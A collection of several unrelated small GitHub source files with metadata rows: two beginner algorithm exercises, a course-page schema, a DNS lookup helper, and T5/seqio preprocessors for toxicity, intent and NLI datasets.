neutron/api/rpc/agentnotifiers/helo_rpc_agent_api.py
helo_rpc_agent_api.py
py
1,219
python
en
code
0
github-code
36
22292420863
# 0. 동빈나 책. 1이 될때 까지. # 1. greedy # 2. 빼야한다면 빼고, 나눌수있다면 나누기먼저. # 입력예제 # 17 4 답은 3 n,k=map(int,input().split()) count=0 while 1: temp=(n//k)*k count+=n-temp n=temp if n<k: break count+=1 n//=k count+=n-1 print(count)
98hyun/algorithm
greedy/b_3.py
b_3.py
py
317
python
ko
code
0
github-code
36
69912139304
from ._common import basic_element SCHEMA = { "type": "dict", "required_keys": {"content": {"type": "string", "nullable": True}}, "optional_keys": {"urgent": {"type": "boolean", "default": False}}, } announcement_box = basic_element("announcement_box.html", SCHEMA)
eldridgejm/automata
automata/api/coursepage/elements/announcement_box.py
announcement_box.py
py
281
python
en
code
0
github-code
36
11358969821
import sys sys.stdin = open('일곱난쟁이.txt') def comb(dep=0): global check if check == 1: return if len(arr) == n: tmp = 0 for i in range(n): tmp += arr[i] if tmp == 100: check = 1 for j in sorted(arr): print(j) return if dep == len(info): return for k in range(dep, len(info)): arr.append(info[k]) comb(k+1) arr.pop() info = [] for _ in range(9): info.append(int(input())) check = 0 n = 7 arr = [] comb()
Jade-KR/TIL
04_algo/study/01/일곱난쟁이.py
일곱난쟁이.py
py
564
python
en
code
0
github-code
36
451073459
#!/usr/bin/python3 from .config_utils import get_base_config from .log_utils import get_module_logger import DNS import os import sys import time import validators CDIR = os.path.dirname(os.path.realpath(__file__)) ROOTDIR = os.path.abspath(os.path.join(CDIR, os.pardir)) BASECONFIG = get_base_config(ROOTDIR) LOGGING = get_module_logger(__name__) DNS.defaults['server'] = ['8.8.8.8', '8.8.4.4'] DNS.defaults['timeout'] = 5 def forward_dns_lookup(host_name): """Perform a DNS lookup of a FQDN. Params: - host_name: (type: string) FQDN to perform lookup of. Returns: - result: (type: string) resulting IP address. """ try: ip_list = DNS.dnslookup(host_name, 'A') if len(ip_list) > 0: for ip_addr in ip_list: if validators.ipv4(ip_addr): return ip_addr except BaseException: LOGGING.warning('DNS lookup of {0} failed.'.format(host_name)) return None return None def resolve_dns(host_name): """Perform a DNS lookup of a FQDN. Params: - host_name: (type: string) FQDN to perform lookup of. Returns: - result: (type: string) resulting IP address. """ if validators.ipv4(host_name): return host_name ip_addr = forward_dns_lookup(host_name) if ip_addr is not None: return ip_addr return False
phage-nz/ph0neutria
core/dns_utils.py
dns_utils.py
py
1,379
python
en
code
299
github-code
36
17895276920
from typing import Dict, Mapping, Sequence, Text, Union import seqio import tensorflow as tf AUTOTUNE = tf.data.experimental.AUTOTUNE NALUE_INPUT_NAME = 'sentence' NALUE_OUTPUT_NAMES = ('vertical', 'domain', 'intent') T5Text = Union[tf.Tensor, Text] def toxic_comments_preprocessor_binary_classification( dataset: tf.data.Dataset, label_tokens: Sequence[str] = ('<extra_id_0>', '<extra_id_1>'), threshold: float = 0.5) -> tf.data.Dataset: """Converts a toxicity detection dataset to classification format. Toxicity detection task maps a sentence to a binary class of '<extra_id_0>' (non-toxic) and '<extra_id_1>' (toxic). A floating toxicity score (e.g., 0.3) will be converted to binary using a threshold. For example, a typical example might look like { 'text': 'Some text.', 'toxicity': 0.3, } This example would be transformed to { 'inputs': 'Some text.', 'targets': '<extra_id_0>', } Args: dataset: a tf.data.Dataset containing examples to process. label_tokens: Strings indicating the two classes of the binary labels. They should correspond to one of the extra tokens in SentencePiece tokenizer. threshold: the binary threshold for converting a continuous score (e.g., 0.3) to toxicity label. Returns: A mapped toxicity detection dataset in text2text format. """ label_tokens = tf.constant(label_tokens) def _map_fn(ex: Mapping[str, tf.Tensor]) -> Mapping[str, tf.Tensor]: label_index = tf.cast(ex['toxicity'] > threshold, tf.int32) label_string = tf.gather(label_tokens, label_index) return {'inputs': ex['text'], 'targets': label_string} return dataset.map(_map_fn, num_parallel_calls=AUTOTUNE) def toxic_comments_preprocessor_rank_classification( dataset: tf.data.Dataset, all_labels: Sequence[str] = ('0', '1'), input_feature: str = 'text', target_feature: str = 'toxicity', threshold: float = 0.5) -> tf.data.Dataset: """Reformats toxicity dataset to use rank classification preprocessor. Adapted from privacy.research.hark.t5.preprocessors.binary_classification. In this method, we convert examples having a `text` and a `toxicity` feature to a format that is subsequently consumed by a rank classification formatter. The `rank_classification_formatter` in T5 preprocessors then consumes the output features and creates two examples with `inputs` as input and each of `choice1` and `choice2` as targets. Each combination is then scored given the ground-truth `label`. Input data format: { 'text': 'Some text.', 'toxicity': 0.3, } This function will return example of the format: { 'inputs': 'Some text.', 'choice1': '0', 'choice2': '1', ’label‘: 0 } Args: dataset: A dataset to process. all_labels: Strings indicating the two classes of the binary labels. input_feature: Input feature name. target_feature: Target feature name. threshold: the binary threshold for converting a continuous score (e.g., 0.7) to toxicity label. Returns: A dataset preprocessed with the format listed above. """ def _map_fn(ex: Mapping[str, tf.Tensor]) -> Mapping[str, tf.Tensor]: return { 'inputs': ex[input_feature], 'choice1': tf.constant(all_labels[0], dtype=tf.string), 'choice2': tf.constant(all_labels[1], dtype=tf.string), 'label': tf.cast(ex[target_feature] > threshold, dtype=tf.int32) } return dataset.map(_map_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE) def make_intent_to_token_map(intent_names: Sequence[str], intent_tokens: Sequence[str], unk_token: str) -> tf.lookup.StaticHashTable: """Creates a StaticHashTable that maps intent names to special tokens. Different from Dict, the StaticHashTable supports value-based key lookup based on a tf.Tensor string, which is important from working with tf.data-based input processors. Args: intent_names: A sequence of possible intent names. intent_tokens: A sequence of SentencePiece tokens corresponding to the intent names. unk_token: The token for unknown vocabulary values. Returns: A StaticHashTable that maps intent_names to special tokens in the format of '<extra_id_X>' where X is an integer. """ mapping_initializer = tf.lookup.KeyValueTensorInitializer( keys=tf.constant(intent_names), values=tf.constant(intent_tokens)) intent_to_token_mapping = tf.lookup.StaticHashTable( mapping_initializer, default_value=tf.constant(unk_token)) return intent_to_token_mapping def tokenize_compositional_intents( example: Mapping[str, tf.Tensor], intent_to_token_map: tf.lookup.StaticHashTable, separator: str = ' ') -> tf.string: """Converts an intent tuple into a string of special tokens. This function extracts intent names from an example with fields listed in NALUE_OUTPUT_NAMES (e.g., "vertical", "domain", "intent"), convert them into special tokens and then concatenantes them into a string. For example: Input data format: { 'vertical': 'Answers', 'domain': 'Dictionary', 'intent': 'Translate' } We will then extract the intent names 'Answers', 'Dictionary', 'Translate' and convert them into special tokens using intent_to_token_map. Output data format: '<token_1> <token_2> <token_3>'. where `<token_X>` are the tokens corresponding to the names 'Answers', 'Dictionary', 'Translate' as defined in intent_to_token_map. Args: example: An input example with fields ('vertical', 'domain', 'intent'). intent_to_token_map: A StaticHashTable that maps intent name to the corresponding special token. separator: The string separater that is used to join special tokens into a string. Returns: A string with format '<token_1> <token_2> <token_3>'. """ intent_tokens = [] # Extracts intent_name, and convert them into intent_tokens. for output_field in NALUE_OUTPUT_NAMES: intent_name = example[output_field] intent_token = intent_to_token_map[intent_name] intent_tokens.append(intent_token) return tf.strings.reduce_join(intent_tokens, separator=separator) @seqio.map_over_dataset def nalue_preprocessors_classification( example: Mapping[str, tf.Tensor], intent_to_token_map: tf.lookup.StaticHashTable) -> Dict[str, tf.Tensor]: """Preprocess NALUE examples into text2text format. Input data format: { 'sentence': 'some sentence'. 'vertical': 'Answers', 'domain': 'Dictionary', 'intent': 'Translate' } This function will convert the intent names in ('vertical', 'domain', 'intent') into corresponding singular tokens for seqio.SentencePieceVocabulary() (e.g., a sentence piece that will be encoded into a single by seqio.SentencePieceVocabulary().encode()), and then concatenate them together as the output string. Output data format: { 'inputs': 'some sentence'. 'targets': '<token_1> <token_2> <token_3>', } In this way, after tokenization, the target sequence that the model should predict will be a sequence of three tokens (vertical_name_token, domain_name_token, intent_name_token). Args: example: A NALUE example with fields ('sentence', 'vertical', 'domain', 'intent'). intent_to_token_map: A mapping that maps intent names in the ('vertical', 'domain', 'intent') fields to special tokens. Returns: A processed example. """ inputs = example[NALUE_INPUT_NAME] targets = tokenize_compositional_intents(example, intent_to_token_map) return {'inputs': inputs, 'targets': targets} def process_nli_inputs(example: Mapping[str, T5Text], data_type: str = 'mnli') -> tf.Tensor: """Processes the sentence-pair inputs from MNLI and HANS examples. This function converts the sentence-pair inputs from NLI examples from MNLI or HANS datasets into a unified format. Specifically, Input data format from MNLI: { 'premise': 'some sentence 1.', 'hypothesis': 'some sentence 2.', } Input data format from HANS (notice the extra blank before period): { 'sentence1': 'some sentence 1 .', 'sentence2': 'some sentence 2 .', } Output: 'premise: some sentence 1. hypothesis: some sentence 2.' Args: example: An input example with fields ('premise', 'hypothesis') if `data_type = 'mnli'`) or ('sentence1', 'sentence2') if `data_type='hans'`. data_type: The source dataset, can only be 'mnli' or 'hans'. Returns: A string in the format 'premise: {1ST_SENTECE}. hypothesis: {2ND_SENTECE}.' Raises: ValueError: If data_type is not one of ('mnli', 'hans'). """ supported_data_type = ('mnli', 'hans') if data_type not in supported_data_type: raise ValueError( f'data_type must be one of {supported_data_type}. Got "{data_type}".') # Extracts sentence from example. if data_type == 'mnli': premise = example['premise'] hypothesis = example['hypothesis'] else: # Remove the space before period. process_hans_str = lambda s: tf.strings.regex_replace(s, ' .$', '.') premise = process_hans_str(example['sentence1']) hypothesis = process_hans_str(example['sentence2']) # Concatenant sentences following t5.data.preprocessors.glue(). strs_to_join = ['premise:', premise, 'hypothesis:', hypothesis] return tf.strings.join(strs_to_join, separator=' ') @seqio.map_over_dataset def nli_preprocessors_classification( example: Mapping[str, tf.Tensor], intent_to_token_map: tf.lookup.StaticHashTable, data_type: str = 'mnli', mnli_label_names: Sequence[str] = ('entailment', 'neutral', 'contradiction') ) -> Dict[str, tf.Tensor]: """Preprocess NLI examples from MNLI or HANS into classification format. Input data format (MNLI): { 'premise': 'some sentence 1.'. 'hypothesis': 'some sentence 2.'. "label": 1, } Input data format (HANS): { 'sentence1': 'some sentence 1 .'. 'sentence2': 'some sentence 2 .'. "gold_label": 'entailment', } Output data format: { 'inputs': 'premise: {1ST_SENTENCE} hypothesis: {2ND_SENTENCE}', 'targets': '<token_1>', } Args: example: An NLI example from MNLI or HANS. intent_to_token_map: A mapping that maps intent names ('entailment', 'non-entailment', 'neutral', 'contradiction') into binary tokens. (i.e., 'entailment' into class 1, otherwise to class 0). data_type: The source dataset, can only be 'mnli' or 'hans'. mnli_label_names: a ordered list of MNLI label names corresponding to class index. Returns: A processed example. Raises: ValueError: If data_type is not one of ('mnli', 'hans'). """ sentence = process_nli_inputs(example, data_type=data_type) if data_type == 'mnli': label_name = tf.gather(mnli_label_names, example['label']) else: label_name = example['gold_label'] label_token = intent_to_token_map[label_name] return {'inputs': sentence, 'targets': label_token}
google/uncertainty-baselines
baselines/t5/data/preprocessors.py
preprocessors.py
py
11,183
python
en
code
1,305
github-code
36